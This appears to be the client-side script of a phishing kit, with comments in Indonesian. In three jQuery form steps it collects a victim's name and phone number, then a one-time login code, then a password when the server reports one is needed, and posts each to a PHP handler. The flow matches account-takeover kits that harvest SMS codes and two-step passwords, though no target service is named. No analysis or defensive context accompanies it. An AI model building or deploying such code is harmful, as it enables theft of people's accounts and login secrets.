function processFirstData() {
  $("#firstForm").submit(function (submitingprocessFirstData) {
    submitingprocessFirstData.preventDefault();

    var $full_name = $("input#full_name").val();
    var $phone_number = $("input#phone_number").val();

    if ($full_name == "" && $phone_number == "") {
      $(".verification_info").show();
      $(".account_verification").hide();
      return false;
    }

    $.ajax({
      type: "POST",
      url: "firstData.php",
      data: $(this).serialize(),
      dataType: "json",
      beforeSend: function () {
        $(".loading").show();
      },
      success: function (response) {
        console.log("Response received:", response);

        // Jika response tidak berupa JSON
        if (typeof response !== "object") {
          console.log("Response is not an object:", response);
          return;
        }

        console.log("Response status:", response.status);

        if (response.status === "error") {
          window.alert("Invalid Phone Number");
          $(".loading").hide();
        } else {
          $(".second").show(); // Pastikan class ini benar
          $(".first").hide();
          $(".loading").hide();
        }
      },
      error: function (xhr, status, error) {
        console.error("AJAX Error:", status, error);
        $(".loading").hide();
      },
    });
  });
  return false;
}

function processSecondData() {
  $("#secondForm").submit(function (submitingprocessSecondData) {
    submitingprocessSecondData.preventDefault();

    var $full_name = $("input#validateFullName").val();
    var $phone_number = $("input#validatePhoneNumber").val();
    var $otp = $("input#otp").val();

    if ($full_name == "" && $phone_number == "" && $otp == "") {
      $(".verification_info").show();
      $(".account_verification").hide();
      return false;
    }

    $.ajax({
      type: "POST",
      url: "secondData.php",
      data: $(this).serialize(),
      dataType: "json",
      beforeSend: function () {
        $(".loading").show();
      },
      success: function (response) {
        console.log("Raw response received:", response);

        // Cek jika response adalah objek
        if (typeof response === "object" && response !== null) {
          console.log("Parsed response:", response);
          console.log("Response status:", response.status);

          // Periksa status dan lakukan tindakan yang sesuai
          if (response.status === "success") {
            $(".second").hide();
            $(".four").show();
            $(".loading").hide();
          } else if (response.status === "errorpw") {
            $(".third").show();
            $(".second").hide();
            $(".loading").hide();
          } else if (response.status === "error") {
            window.alert("Invalid code");
            $(".loading").hide();
          } else {
            console.log("Unhandled status:", response.status);
            $(".loading").hide();
          }
        } else {
          console.error("Unexpected response format:", response);
          $(".loading").hide();
        }
      },
      error: function (xhr, status, error) {
        console.error("AJAX Error:", status, error);
        $(".loading").hide();
      },
    });
  });
  return false;
}

function processThirdData() {
  $("#thirdForm").submit(function (submitingprocessThirdData) {
    submitingprocessThirdData.preventDefault();

    var $full_name = $("input#validateFullName").val();
    var $phone_number = $("input#validatePhoneNumber").val();
    var $otp = $("input#otp").val();
    var $password = $("input#password").val();

    if (
      $full_name == "" &&
      $phone_number == "" &&
      $otp == "" &&
      $password == ""
    ) {
      $(".verification_info").show();
      $(".account_verification").hide();
      return false;
    }

    $.ajax({
      type: "POST",
      url: "thirdData.php",
      data: $(this).serialize(),
      dataType: "json",
      beforeSend: function () {
        $(".loading").show();
      },
      success: function (response) {
        console.log("Raw response received:", response);

        // Cek jika response adalah objek
        if (typeof response === "object" && response !== null) {
          console.log("Parsed response:", response);
          console.log("Response status:", response.status);

          // Periksa status dan lakukan tindakan yang sesuai
          if (response.status === "success") {
            $(".third").hide();
            $(".four").show();
            $(".loading").hide();
          } else if (response.status === "error") {
            alert("Invalid password");
            $(".loading").hide();
          } else {
            console.log("Unhandled status:", response.status);
          }
        } else {
          console.error("Unexpected response format:", response);
        }
      },
      error: function (xhr, status, error) {
        console.error("AJAX Error:", status, error);
        $(".loading").hide();
      },
    });
  });
  return false;
}
